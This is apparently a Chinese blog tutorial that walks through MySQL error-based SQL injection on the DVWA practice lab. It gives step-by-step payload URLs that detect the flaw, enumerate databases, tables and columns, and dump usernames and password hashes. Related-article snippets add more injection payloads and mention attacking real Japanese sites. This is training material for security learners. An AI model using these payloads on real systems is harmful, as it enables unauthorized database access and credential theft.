mysql高级报错注入_mysql新型报错注入实例

最新推荐文章于 2024-05-24 15:55:04 发布
最新推荐文章于 2024-05-24 15:55:04 发布
阅读量131 收藏
点赞数
文章标签: mysql高级报错注入
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_39913807/article/details/113957285
版权

使用DVWA的第一关作为例子讲解一下mysql的新型注入。

第一关链接:http://localhost:8080/dvwa/vulnerabilities/sqli/?id=1&Submit=%C8%B7%B6%A8# ,参数id存在注入

20140630214111.jpg

http://localhost:8080/dvwa/vulnerabilities/sqli/?id=1’&Submit=%C8%B7%B6%A8#

20140630214145.jpg

可以看到将id参数设为1’时报错了,该处存在mysql的字符型报错注入。下面讲解一下具体如何使用mysql新型报错注入来获取信息。

1、判断是否存在新型报错注入

http://localhost:8080/dvwa/vulnerabilities/sqli/?id=1' and 18446744073709551610*2 and '1'='1&Submit=%C8%B7%B6%A8#

20140630214616.jpg

可以看到注入点数据库存在新型报错注入。

2、获取version等信息,如version(),user(),database()等

http://localhost:8080/dvwa/vulnerabilities/sqli/?id=1' and (select!x-~0.FROM(select+version()x)f) and '1'='1&Submit=%C8%B7%B6%A8#

20140630221841.jpg

3、暴库

http://localhost:8080/dvwa/vulnerabilities/sqli/?id=1' and (select!x-~0.FROM(select group_concat(SCHEMA_NAME)x from information_schema.SCHEMATA)f)and '1'='1&Submit=%C8%B7%B6%A8#

20140630222336.jpg

4、爆表

http://localhost:8080/dvwa/vulnerabilities/sqli/?id=1' and (select!x-~0.FROM(select group_concat(TABLE_NAME)x from information_schema.TABLES where TABLE_SCHEMA='dvwa')f)and '1'='1&Submit=%C8%B7%B6%A8#

20140630223039.jpg

5、爆列

http://localhost:8080/dvwa/vulnerabilities/sqli/?id=1' and (select!x-~0.FROM(select group_concat(COLUMN_NAME)x from information_schema.COLUMNS where TABLE_NAME='users')f)and '1'='1&Submit=%C8%B7%B6%A8#

20140630223305.jpg

6、爆数据

http://localhost:8080/dvwa/vulnerabilities/sqli/?id=1' and (select!x-~0.FROM(select group_concat(user,':',password)x from dvwa.users)f)and '1'='1&Submit=%C8%B7%B6%A8#

20140630223535.jpg

———————————————————————————————————————

下面是测试时的其他语句,不过没有上面那么简洁,使用时使用上面的语句即可。

获取version信息

http://localhost:8080/dvwa/vulnerabilities/sqli/?id=1' and 1E308*if((select*from(select version())x),2,2) and '1'='1&Submit=%C8%B7%B6%A8#

20140630214923.jpg

暴库

http://localhost:8080/dvwa/vulnerabilities/sqli/?id=1' and 1E308*if((select SCHEMA_NAME from(select *from information_schema.SCHEMATA LIMIT 0,1)a limit 1),2,2) and '1'='1&Submit=%C8%B7%B6%A8#

20140630220538.jpg

20140630220603.jpg

20140630220629.jpg

只要不断改变上面的limit后面的参数,就可以把所有的库爆出来。

爆表

http://localhost:8080/dvwa/vulnerabilities/sqli/?id=1' and 1E308*if((select TABLE_NAME from(select * from information_schema.TABLES where TABLE_SCHEMA='dvwa' limit 1,1)a limit 1),2,2) and '1'='1&Submit=%C8%B7%B6%A8#

20140630221252.jpg

和上面爆库一样,只要不断改变limit后面的数值就可以爆出所有的表。

参考资料:

1、http://www.jinglingshu.org/?p=7343

2、http://www.myhack58.com/Article/html/3/7/2011/30958.htm

weixin_39913807
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
MYSQL报错注入
聚鼎安全
01-08 3286
目录审计思路报错语句报错函数查询表floor报错函数讲解报错原理语句xpath语法报错函数讲解语句整数溢出报错exppowcot列名重复报错name_constjoin using几何函数报错不存在函数报错 审计思路 代码中带入查询的参数没有经过任何过滤并产生报错,具有报错信息提示,就可以用报错查询。 常用报错检测符号:’ \ ; %00 ) ( # " 报错函数通常尤其最长报错输出的限制,面对这种情况,可以进行分割输出。 特殊函数的特殊参数进运行一个字段、一行数据的返回,使用group_c
MySQL五种报错注入1
08-04
MySQL五种报错注入是一种利用数据库的错误反馈信息来获取敏感数据的技术,通常在网站存在SQL注入漏洞时被攻击者利用。以下将详细介绍这些方法: 1. **数据库版本暴露** 利用`information_schema.tables`系统表和`...
mysql报错注入实战_手工注入——MySQL手工注入实战和分析
weixin_39746382的博客
01-18 98
今天进行了MySQL手工注入实战,分享一下自己的实战过程和总结,这里环境使用的是墨者学院的在线靶场。话不多说,咱们直接开始。第一步,判断注入点通过 ' 和构造 and 1=1 和 and 1=2 查看页面是否报错。这里通过and 1=1 发现页面正常。如下图。接下来,咱们再构造 and 1=2 发现页面报错,说明页面存在注入点。如下图。第二步,判断字段数通过 order by 语句,如果后面输入的...
Mysql注入详细讲解
最新发布
2401_84466359的博客
05-24 1054
*原理:**用户向数据库里存入恶意的数据,在数据被插入到数据库之前,肯定会对数据库进行转义处理,但用户输入的数据的内容肯定是一点摸样也不会变的存进数据库里,而一般都默认为数据库里的信息都是安全的,查询的时候不会进行处理,所以当用户的恶意数据被web程序调用的时候就有可能出发SQL注入。GET/POST提交数据时,发现提交的数据被加密了(可能js加密),那么在提交数据前,抓包,解密,将注入语句写好,然后将整个语句进行加密(相同加密算法),再将数据发过去。HTTP 头注入常常发生在程序采集用户信息的模块中。
mysql报错注入实战_MySQL手工注入实战
weixin_34972980的博客
02-02 166
实战记录,日本某站注入点 and 语句测试and1=1 返回正常,and=2跳回首页,可能过滤了用 ’ 测试返回错误页面判断为注入点order by语句查询字段数测试字段数为9and 1=2 UNION SELECT 1,2,3,4,5,6,7,8,9报错联合查询语句,查询显示位2、3为显示位使用注入函数可爆出数据库版本信息and 1=2 UNION SELECT 1,@@version_comp...
sql注入pythonpoco_十种MySQL报错注入
weixin_39532352的博客
12-11 97
1.floor()select * from test where id=1 and (select 1 from (select count(*),concat(user(),floor(rand(0)*2))x from information_schema.tables group by x)a);2.extractvalue()select * from test where id=1 a...
mysql高级报错注入_MYSQL高级报错注入
weixin_34449520的博客
02-08 144
MYSQL高级报错注入and (select count(*) from mysql.user)>0/*1、查看MYSQL版本and+exists(select*from+(select*from(select+name_const(@@version,0))a+join(select+name_const(@@version,0))b)c)2、爆所有库and(select 1 from(s...
Mycat处理连接数据库8.0以上程序报错query_cache_size
04-08
然而,当Mycat与MySQL 8.0及以上版本配合使用时,可能会遇到一些兼容性问题,其中“query_cache_size”报错就是典型的例子。 在MySQL 8.0中,查询缓存功能被默认禁用,并且在某些版本中被完全移除。这是由于MySQL...
mysql数据库安装报错VCRUNTIME140_1.dll
10-04
MySQL数据库是世界上最受欢迎的开源关系型数据库之一,其稳定性和高效性深受开发者的青睐。然而,在安装过程中,用户可能会遇到各种问题,其中一种常见的错误就是“VCRUNTIME140_1.dll”缺失的问题。这个错误通常...
web-报错注入-皮卡丘靶场
07-15
报错注入】是一种安全漏洞,它发生在攻击者能够通过输入特定的数据,导致应用程序返回关于其内部结构或数据库状态的错误信息。这种错误信息可以揭示敏感信息,如数据库名称、表名、列名,甚至数据本身,从而为攻击...
mysql报错注入实战_十种MySQL报错注入
weixin_35377249的博客
02-02 104
以下均摘自《代码审计:企业级Web代码安全架构》一书1.floor()select * from test where id=1 and (select 1 from (select count(*),concat(user(),floor(rand(0)*2))x from information_schema.tables group by x)a);2.extractvalue()selec...
mysql日本_MYSQL手工注入某日本网站
weixin_39934257的博客
01-19 423
作者:ice 团队:www.anying.org 转载必须注明。E-mail:1c30day@gmail.com经过一天的辛苦劳动下班了,实在无聊,QQ上的基友基本都挂机睡觉了。找点乐子打发时间,看了一下2013年OWASP Top Ten Project, Injection排在第一。去了解注入,还是有必要的。随便google了几个日本网站,发现不少都在注入点,有很多用手工都比较鸡肋,终于找...
mysql报错注入
include_heqile的博客
04-11 300
参考文章 备份连接 本地测试未复现 mysql版本为5.7.26
MySQL报错注入
秋水的博客
09-03 1461
注入简介 什么是报错注入? 顾名思义,报错注入就是通过页面爆出的错误信息,构造合适的语句来获取我们想要的数据,本章节讲述的注入,数据库为MySQL 报错注入成因 那么报错注入是怎么形成的呢? 首先是应用系统未关闭数据库报错函数,对于一些SQL语句的错误,直接回显在了页面上,部分甚至直接泄露数据库名和表名; 其次,必不可少就是后台未对MySQL相应的报错函数进行过滤 引入知识 ...
MySQL报错注入
yuan_boss的博客
08-23 2178
触发报错的方式有很多,具体细节也不尽相同。注意:通过concat()函数拼接的字符串长度只有31位,所以需要借助substr对结果进行截取,然后通过替换截取的下标来获取所有信息。领取地址:链接:https://pan.baidu.com/s/1OeEMML4GRCsbC4LpQK9KoA?cms靶场中具有sql注入的地址:http://localhost/cms/cms/show.php?​ 在注入点的判断过程中,发现数据库中SQL 语句的报错信息,会显示在页面中,因此可以利用报错信息进行注入。
mysql报错注入实战_MySQL 报错注入原理分析以及运用
weixin_42513448的博客
02-28 203
0x00 前言之前在做sqli-labs 第五第六题的时候是利用盲注来进行做的 中途操作过程非常繁杂每个信息都要使用脚本来进行拆解 就算我用python编了相应的脚本 仍然感觉麻烦 所以昨天再去看了看 好像题目的本意不是让我们用盲注的方法来实现的 题目是想让我们使用报错注入 (双查询注入)来进行获取数据库的一些信息0x01 原理分析首先需要知道的一些知识为什么叫做报错注入 原因就是我们是通过反馈出...
mysql报错注入_Mysql报错型注入总结
weixin_33842969的博客
12-23 289
Mysql注入虽然是老生常谈的问题,但是工作中更多的是使用sqlmap等工具进行注入测试的,原理方面还是不是很清楚,所以这段时间主要是自己搭建环境在学手工注入,简单的将自己的学习做一个总结和记录。在常见的注入类型中报错型注入是最简单的,也是最少的了,大多数都得采用盲注手法来测试,所以下文是对Mysql数据库报错型注入的一个总结。首先认识MySQL UPDATE 查询:如果我们需要修改或更新 MyS...
mysql报错注入_mysql报错注入
weixin_29214335的博客
01-13 257
报错注入这里主要介绍3种MySQL数据库报错注入的发法,分别是updatexml、floor和exp。1.updatexmlupdatexml的报错原理从本质上来说就是函数的报错。selectupdatexml(1,concat(0x7e,(select version()),0x7e),1);这里还是使用前面的例子,举出一个爆破数据库版本的样例Payload:爆破数据库版本信息?id=1' +...
连接mysql8报错caching_sha2_password
11-05
连接MySQL8时,如果出现“caching_sha2_password”报错,这是因为MySQL8默认的身份验证插件已更改为caching_sha2_password,而不是之前的mysql_native_password。解决此问题的方法有两种: 1. 更改MySQL用户的身份...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值